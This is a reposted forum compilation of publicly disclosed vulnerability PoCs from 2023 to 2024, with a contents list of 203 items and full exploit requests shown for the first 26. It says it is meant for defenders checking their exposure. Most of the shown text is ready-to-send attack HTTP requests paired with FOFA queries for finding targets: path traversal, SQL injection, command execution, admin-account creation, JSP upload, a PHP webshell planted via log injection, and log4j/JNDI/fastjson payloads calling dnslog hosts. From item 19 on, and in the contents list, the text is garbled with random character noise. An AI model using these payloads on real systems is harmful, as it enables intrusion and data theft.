Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06 (repost)

Posted 2024-6-5 14:31:29

Compilation of publicly disclosed internet vulnerabilities, 2023-09 to 2024-06
道一安全 (Daoyi Security), 2024-06-05 07:41, Beijing
The following article is from the public account 网络安全新视界 (author: 网络安全新视界).

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attack activity, and this article is intended to help with defence. Defensive teams can use its contents to check their own exposure.

Vulnerability sources: The article covers 203 PoCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: All of the vulnerabilities are public. For patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few PoCs that are too long are replaced uniformly with the word PAYLOAD; if you need the complete PoC, search for it yourself.

Legal rights: If any content infringes a party's legal rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the complete version as it stands; press F12 and search for keywords when using it.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).

01 Contents
0 ?0 z  R$ l3 ?3 O: P# c
1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice Yiweiyun (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro (百卓) Smart management platform importexport.php SQL injection
61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
65. Youkate (优卡特) Lian'aiyun face-pass smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Synjones (新开普) handheld campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) bandwidth-control router remote command execution
80. Superdata (速达) Tianyao software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese Tosei self-service laundry machine RCE
87. DBAppSecurity (安恒) Mingyu security gateway aaa_local_web_preview file upload
88. DBAppSecurity Mingyu security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin Wangshen SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian Kirisun (科立讯) communication command and dispatch platform down_file.php SQL injection
138. Fujian Kirisun communication command and dispatch platform pwd_update.php SQL injection
139. Fujian Kirisun communication command and dispatch platform editemedia.php SQL injection
140. Fujian Kirisun communication command and dispatch platform get_extension_yl.php SQL injection
141. Kirisun communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. Tianweier (天维尔) fire rescue operations dispatch platform SQL injection
155. Liuling navigation page (六零导航页) file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. Meite (美特) CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. Infinitt (英飞达) PACS WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. Keytop (科拓) intelligent parking payment system Webservice.asmx arbitrary file upload
162. Hefeng (和丰) multimedia information publishing system QH.aspx arbitrary file upload
163. Haoka Jituan (号卡极团) distribution management system ue_serve.php arbitrary file upload
164. Huixiaoyuan (Anxiaoyi, 慧校园/安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. Zhongcheng Kexin (中成科信) ticketing management platform SeatMapHandler SQL injection
167. Jingyi (精益) value management system DownLoad.aspx arbitrary file read
168. Hongjing (宏景) EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. Tongtianxing (通天星) CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher (金和) OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. Jianwen (建文) project management system arbitrary file read
180. Bangguanke (帮管客) CRM jiliyu SQL injection
181. Runshen Technology (润申科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. Runshen Technology enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou Tuchuang (图创) library cluster management system updOpuserPw SQL injection
184. Xunrao Technology (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
185. Ruiyou Tianyi (瑞友天翼) application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
189. Lanwang Technology (蓝网科技) clinical viewing system deleteStudy SQL injection
190. Short-video matrix marketing system (短视频矩阵营销系统) poihuoqu arbitrary file read
191. Esafenet (亿赛通) electronic document security management system NavigationAjax SQL injection
192. Futong Tianxia (富通天下) foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) Yunjian security management system setsystemtimeaction command execution
194. Feiqi Internet (飞企互联) FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. Volans (飞鱼星) internet behavior management system send_order.cgi command execution
196. Henan Fengsu Technology (风速科技) unified authentication platform password reset
197. Zheda Ente customer resource management system Quotegask_editAction SQL injection
198. Aliyun Drive (阿里云盘) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) omnimedia news editing system binary SQL injection
202. WeEngine (微擎) AccountEdit arbitrary file upload
203. Hongcloud (红海云) EHR PtFjk file upload

02 PoC list
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. Hongyun (鸿运) active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin panel with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-1 login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. Doccms (稻壳CMS) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

The payload is the following statement, double URL-encoded:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request. The injected PHP executes the base64-decoded value of a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan (红帆) iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. Hongfan HFOffice Yiweiyun (医微云) SQL injection
FOFA: title="HFOffice"
The PoC calls a database function that computes the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入* B- i6 J: V4 i& i, [
FOFA:app="dahua-DSS"  U: M9 C/ b! j  e8 d5 D
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
/ W8 n' ?# R' m1 @- S) [7 P9 LHost:. i. U) s% o( n+ V# b4 T: k
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ ?7 F: s7 C  z8 K1 N, {1 `Accept-Encoding: gzip, deflate& N; a- a/ W% w
Accept: */*
" c  O( l7 {8 vConnection: keep-alive& ?( Z- X5 o) {

: Y  b& H/ d3 Q5 p& z0 O- d
0 U1 e9 |# R2 v& ?( Z20. 大华ICC智能物联综合管理平台任意文件读取
; L; Z1 T5 T! o9 q2 j5 q, k' W; XFOFA:body="*客户端会小于800*"
/ A/ Q! E# f7 `% DGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
" b3 i( ]+ X. ^; |. vHost: x.x.x.x
( x  A+ N2 Q8 e  V+ R8 }! lUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 E+ g5 Y$ q# s( G( ^* u, B
Connection: close+ B+ d0 d' J5 a# d9 |7 C
Accept: */*, ^4 ~5 d6 j. E6 ^- j0 v+ n
Accept-Language: en4 l: p* `; P# I+ U6 s7 k4 _
Accept-Encoding: gzip* n1 d4 j. i8 y* A- C

/ p9 i; ]" o# y6 Y1 O
3 [. ?3 ~9 R( T# B: Y  V2 D21. 大华ICC智能物联综合管理平台random远程代码执行
8 s, t! `( M3 q9 i5 tFOFA:icon_hash="-1935899595"
: G2 D6 _% V1 i1 z) BPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
, j, {1 A# w4 y/ P0 f0 l" D. }( OHost: x.x.x.x: |  O9 Q- n: s. D, X' j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; J7 {# _; l2 _Content-Length: 161
8 m* c  p& N& yAccept-Encoding: gzip
0 _; [8 S, h+ }& t2 v; x( HConnection: close
3 d1 Z" M7 v" i; o, N( \5 KContent-Type: application/json;charset=utf-86 v8 T2 Q2 _. V% b2 c
& m+ }' v8 f2 `" e+ V9 b* u
{. I) {& N1 E  F+ j! G. x  E8 d
"a":{0 H. ?9 v8 v/ e+ B
   "@type":"com.alibaba.fastjson.JSONObject",
& v0 Q! s. H! I. d* S    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
9 S& G2 M$ B0 t! V) T: C2 j# l  }""
+ @* A. y# D/ F2 \}9 p. ^  m+ y% J& }% Y

5 N, p; Q) t+ U$ W% q# s" |" d
5 }. m9 r5 C* d2 g+ S2 u22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& m' ?- `: l' B/ {4 u+ t" I% p8 ^& WFOFA:icon_hash="-1935899595"( i" G$ G! u# N. [9 a/ b# e1 V
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, ^2 }: d. s$ ^
Host: your-ip
$ c8 ?0 ]1 V5 x' XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) ?7 S) A7 ]0 l2 Y+ ^7 Y8 SContent-Type: application/json;charset=utf-8
3 g$ B! `1 f$ p* M8 A
% r% u6 b% K1 J& |{
. L0 i7 B  [, f. e: J( i+ ~( ]0 e"loginName":"${jndi:ldap://dnslog}"
& e8 Z; A# S9 h* M2 \}
6 D7 y1 y' k0 [' o& C3 p, I! Y1 F3 Z, B2 f! x
4 [. u4 s3 ~5 M, C* I) a# I/ @% }9 g
# x" Z7 M3 B: S: n
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行0 U" p; L! \* m$ d- U- f! o/ t
FOFA:icon_hash="-1935899595"! K0 \: E  {% |
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1& C& J: b+ j  `& T% t8 }
Host: your-ip) B: e: E4 C3 I/ ?  f8 t+ s* U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% w7 }6 `* m- Q- o0 z0 N- @+ u9 BContent-Type: application/json;charset=utf-8
$ W+ {% q, y* F: v. o/ }, YAccept-Encoding: gzip
) U- N# Q$ \' t+ d# L) e% L1 ZConnection: close
$ @* W0 n9 q( l' f
6 {6 y! h/ `, x+ Z) s{
, D3 ]* n4 C- i    "a":{
6 @% y6 a7 u& z% E% i& I  E9 d: @5 \        "@type":"com.alibaba.fastjson.JSONObject",$ f6 U: l. X! h- y, Y; h
       {"@type":"java.net.URL","val":"http://DNSLOG"}
/ @4 k: h7 r* H% `4 U; F        }""
" Q# I; {2 k5 C' J" ^}* G3 P# V9 }9 }

+ }: W5 y  V0 ^! T7 p1 v$ a) D
24. 用友NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. 用友NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. 用友NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
